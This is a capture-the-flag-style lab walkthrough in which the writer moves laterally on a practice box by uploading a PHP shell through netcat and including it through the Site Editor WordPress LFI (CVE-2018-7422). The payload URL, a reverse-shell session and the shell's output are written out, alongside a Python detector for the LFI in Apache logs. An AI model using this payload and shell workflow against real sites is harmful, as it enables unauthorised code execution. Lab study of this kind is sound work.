LFI
After many trials and errors, it was concluded that obtaining the password of the alice user is impossible.
redis@readys:~$ ll /var/www/html
total 224K
4.0K drwxr-xr-x 5 alice alice 4.0K Mar 31 06:25 .
4.0K drwxr-xr-x 7 alice alice 4.0K Mar 31 06:25 wp-content
8.0K -rw-r--r-- 1 alice alice 7.2K Nov 16 2021 readme.html
4.0K -rw-r--r-- 1 alice alice 3.3K Nov 16 2021 wp-load.php
24K -rw-r--r-- 1 alice alice 21K Nov 16 2021 wp-settings.php
32K -rw-r--r-- 1 alice alice 31K Nov 16 2021 wp-signup.php
4.0K -rw-r--r-- 1 alice alice 405 Nov 16 2021 index.php
20K -rw-r--r-- 1 alice alice 20K Nov 16 2021 license.txt
4.0K -rw-r--r-- 1 alice alice 351 Nov 16 2021 wp-blog-header.php
12K drwxr-xr-x 25 alice alice 12K Nov 16 2021 wp-includes
4.0K -rw-r--r-- 1 alice alice 2.5K Nov 16 2021 wp-links-opml.php
4.0K -rw-r--r-- 1 alice alice 2.3K Nov 16 2021 wp-comments-post.php
4.0K -rw-r--r-- 1 alice alice 3.2K Nov 16 2021 wp-config.php
44K -rw-r--r-- 1 alice alice 44K Nov 16 2021 wp-login.php
8.0K -rw-r--r-- 1 alice alice 7.0K Nov 16 2021 wp-activate.php
4.0K -rw-r--r-- 1 alice alice 2.9K Nov 16 2021 wp-config-sample.php
12K -rw-r--r-- 1 alice alice 8.4K Nov 16 2021 wp-mail.php
8.0K -rw-r--r-- 1 alice alice 4.7K Nov 16 2021 wp-trackback.php
4.0K -rw-r--r-- 1 alice alice 523 Nov 16 2021 .htaccess
4.0K drwxr-xr-x 9 alice alice 4.0K Nov 16 2021 wp-admin
4.0K -rw-r--r-- 1 alice alice 3.9K Nov 16 2021 wp-cron.php
4.0K -rw-r--r-- 1 alice alice 3.2K Nov 16 2021 xmlrpc.php
4.0K drwxr-xr-x 3 root root 4.0K Nov 16 2021 ..
redis@readys:~$ cat /etc/apache2/apache2.conf | grep -v '^[#/*]'
DefaultRuntimeDir ${APACHE_RUN_DIR}
PidFile ${APACHE_PID_FILE}
Timeout 300
KeepAlive On
MaxKeepAliveRequests 100
KeepAliveTimeout 5
User alice
Group alice
HostnameLookups Off
ErrorLog ${APACHE_LOG_DIR}/error.log
LogLevel warn
IncludeOptional mods-enabled/*.load
IncludeOptional mods-enabled/*.conf
Include ports.conf
<Directory />
Options FollowSymLinks
AllowOverride None
Require all denied
</Directory>
<Directory /usr/share>
AllowOverride None
Require all granted
</Directory>
<Directory /var/www/>
Options Indexes FollowSymLinks
AllowOverride None
Require all granted
</Directory>
AccessFileName .htaccess
<FilesMatch "^\.ht">
Require all denied
</FilesMatch>
LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
IncludeOptional conf-enabled/*.conf
IncludeOptional sites-enabled/*.conf
However, I realized that the target WordPress instance is running as the alice user.
This is confirmed by the Apache configuration (User alice / Group alice) and by the ownership of the web root directory, both shown above.
Since the target WordPress instance suffers from an LFI vulnerability (CVE-2018-7422) in the Site Editor plugin, and an interactive session is already established on the system as the redis user, remote code execution can be achieved by writing a malicious PHP file to a location the web server can read (here /dev/shm) and then including it through the LFI vulnerability. Because Apache runs as alice, the included code executes as the alice user, so arbitrary code can be executed on the system in that context.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ nc -vn $IP 2222 < shell.php
(UNKNOWN) [192.168.154.166] 2222 (?) open
redis@readys:/dev/shm$ nc -nlvp 2222 > shell.php
listening on [any] 2222 ...
connect to [192.168.154.166] from (UNKNOWN) [192.168.45.218] 52316
Delivery complete
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ curl http://$IP/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/dev/shm/shell.php
Invoking the shell.php file via LFI
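The request above is exactly what lands in the Apache access log declared in the apache2.conf shown earlier (combined format), which makes this LFI detectable after the fact. The following is an added example, not part of the original writeup: it parses combined-format lines, isolates requests to the vulnerable Site Editor endpoint, and flags any ajax_path value that resolves outside the plugin's own directory. It assumes the web root is /var/www/html (as in the listing above) and that the plugin's files live under wp-content/plugins/site-editor/; the log lines are constructed samples.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" LogFormat as declared in the apache2.conf above:
# %h %l %u %t "%r" %>s %O "%{Referer}i" "%{User-Agent}i"
COMBINED = re.compile(r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" '
                      r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*"$')
# Vulnerable Site Editor endpoint and parameter (CVE-2018-7422).
VULN_URI = ("/wp-content/plugins/site-editor/editor/extensions/pagebuilder/"
            "includes/ajax_shortcode_pattern.php")
VULN_PARAM = "ajax_path"
# Assumed web root (/var/www/html, as in the listing above); a legitimate
# ajax_path should never resolve outside the plugin's own directory.
PLUGIN_DIR = "/var/www/html/wp-content/plugins/site-editor/"

def classify_include(value):
    """Return why an ajax_path value is suspicious, or None if it stays in the plugin."""
    v = unquote(value)  # parse_qs decoded once; a second pass catches double encoding
    if "://" in v:
        return "stream wrapper or remote URL"
    # Resolve relative values the way PHP would, from the script's own directory.
    full = v if v.startswith("/") else posixpath.join(PLUGIN_DIR, v)
    if not posixpath.normpath(full).startswith(PLUGIN_DIR.rstrip("/") + "/"):
        return "include outside plugin directory"
    return None

def analyse_line(line):
    # Parse one combined-format line; return a finding dict or None.
    m = COMBINED.match(line.strip())
    if not m:
        return None
    parts = m.group("request").split(" ")
    url = urlsplit(parts[1] if len(parts) > 1 else "")
    if url.path != VULN_URI:
        return None
    for value in parse_qs(url.query, keep_blank_values=True).get(VULN_PARAM, []):
        reason = classify_include(value)
        if reason:
            return {"src": m.group("host"), "status": m.group("status"),
                    "ajax_path": unquote(value), "reason": reason}
    return None

def find_lfi_attempts(lines):
    return [f for f in map(analyse_line, lines) if f]

# Constructed sample lines (not real log data): the include of /dev/shm/shell.php
# from the walkthrough, a normal page load, and a legitimate relative ajax_path.
SAMPLE_LOG = [
    '192.168.45.218 - - [31/Mar/2022:06:30:01 +0000] "GET ' + VULN_URI + '?ajax_path=/dev/shm/shell.php HTTP/1.1" 200 512 "-" "curl/7.81.0"',
    '10.0.0.5 - - [31/Mar/2022:06:30:02 +0000] "GET /index.php HTTP/1.1" 200 405 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [31/Mar/2022:06:30:03 +0000] "GET ' + VULN_URI + '?ajax_path=includes/shortcode.php HTTP/1.1" 200 20 "-" "Mozilla/5.0"',
]
```

Running find_lfi_attempts(SAMPLE_LOG) reports only the first line, with the source address, response status and the decoded include path; a 200 on such a hit is the signal that the include actually succeeded.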
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ nnc 6666
listening on [any] 6666 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.154.166] 34850
SOCKET: Shell has connected! PID: 14127
whoami
alice
hostname
readys
ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.154.166 netmask 255.255.255.0 broadcast 192.168.154.255
inet6 fe80::250:56ff:fe9e:6966 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:9e:69:66 txqueuelen 1000 (Ethernet)
RX packets 62328 bytes 5426812 (5.1 MiB)
RX errors 0 dropped 262 overruns 0 frame 0
TX packets 57386 bytes 7784347 (7.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 45 bytes 4582 (4.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 45 bytes 4582 (4.4 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Lateral movement made to the alice user via LFI